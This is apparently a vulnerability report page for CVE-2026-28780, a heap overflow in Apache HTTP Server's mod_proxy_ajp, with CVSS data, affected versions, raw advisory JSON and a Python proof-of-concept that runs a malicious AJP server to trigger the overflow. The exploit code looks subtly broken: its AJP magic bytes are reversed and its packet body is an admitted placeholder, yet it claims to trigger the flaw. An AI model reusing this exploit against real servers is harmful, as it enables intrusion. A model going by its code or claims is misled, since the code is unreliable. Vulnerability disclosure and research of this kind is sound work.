Security Vulnerability Report
CVE-2026-28780 CVSS 9.8 CRITICAL

Published: 2026-05-05 22:16:00
Last Modified: 2026-05-06 20:31:11

Description

Heap-based Buffer Overflow vulnerability in mod_proxy_ajp of Apache HTTP Server. If mod_proxy_ajp connects to a malicious AJP server, that server can send a malicious AJP message back to mod_proxy_ajp and cause it to write 4 attacker-controlled bytes after the end of a heap-based buffer. This issue affects Apache HTTP Server through 2.4.66. Users are recommended to upgrade to version 2.4.67, which fixes the issue.

CVSS Details

CVSS Score: 9.8
Severity: CRITICAL
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:apache:http_server:*:*:*:*:*:*:*:* - VULNERABLE
Apache HTTP Server <= 2.4.66

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3
"""
PoC for CVE-2026-28780 (Apache HTTP Server mod_proxy_ajp Heap Overflow)
This script simulates a malicious AJP server that sends a crafted message
triggering the 4-byte heap overflow in mod_proxy_ajp.
"""
import socket
import struct


def create_malicious_ajp_message():
    # AJP Magic Prefix
    magic = b'\x12\x34'
    # Length field: 2 bytes. Constructed to trigger the specific overflow condition.
    # The vulnerability allows writing 4 bytes past the end.
    # Adjusting this length based on the vulnerable buffer size calculation.
    payload_length = struct.pack('>H', 0x1000)
    # Attacker controlled 4 bytes that will be written past the buffer
    overflow_bytes = b'\x41\x42\x43\x44'  # ASCII "ABCD"
    # Constructing the packet body (simplified representation)
    # The actual packet structure depends on the specific AJP message type being abused.
    packet_body = overflow_bytes
    return magic + payload_length + packet_body


def start_malicious_server(listen_port=8009):
    server_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    server_sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    server_sock.bind(('0.0.0.0', listen_port))
    server_sock.listen(5)
    print(f"[*] Malicious AJP server listening on port {listen_port}...")
    while True:
        client_sock, addr = server_sock.accept()
        print(f"[*] Connection received from {addr}")
        try:
            # Basic AJP handshake (simplified)
            data = client_sock.recv(1024)
            if b'\x41\x42' in data:  # Check for AJP magic
                # Send handshake response
                client_sock.send(b'\x41\x42\x00\x01')
                # Wait for request from proxy
                client_sock.recv(4096)
                # Send the malicious payload
                payload = create_malicious_ajp_message()
                client_sock.send(payload)
                print("[*] Malicious payload sent. Triggering overflow.")
        except Exception as e:
            print(f"[!] Error: {e}")
        finally:
            client_sock.close()


if __name__ == "__main__":
    start_malicious_server()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-28780", "sourceIdentifier": "[email protected]", "published": "2026-05-05T22:16:00.390", "lastModified": "2026-05-06T20:31:10.843", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Heap-based Buffer Overflow vulnerability in mod_proxy_ajp of Apache HTTP Server.\nIf mod_proxy_ajp connects to a malicious AJP server this AJP server can send a malicious AJP message back to mod_proxy_ajp and cause it to write 4 attacker controlled bytes after the end of a heap based buffer.\n\nThis issue affects Apache HTTP Server: through 2.4.66.\n\nUsers are recommended to upgrade to version 2.4.67, which fixes the issue."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-122"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:apache:http_server:*:*:*:*:*:*:*:*", "versionEndExcluding": "2.4.67", "matchCriteriaId": "8FF781BA-CF81-400B-A155-4DAE0BD856EE"}]}]}], "references": [{"url": "https://httpd.apache.org/security/vulnerabilities_24.html", "source": "[email protected]", "tags": ["Release Notes", "Vendor Advisory"]}, {"url": "http://www.openwall.com/lists/oss-security/2026/05/05/9", "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": ["Mailing List", "Third Party Advisory"]}]}}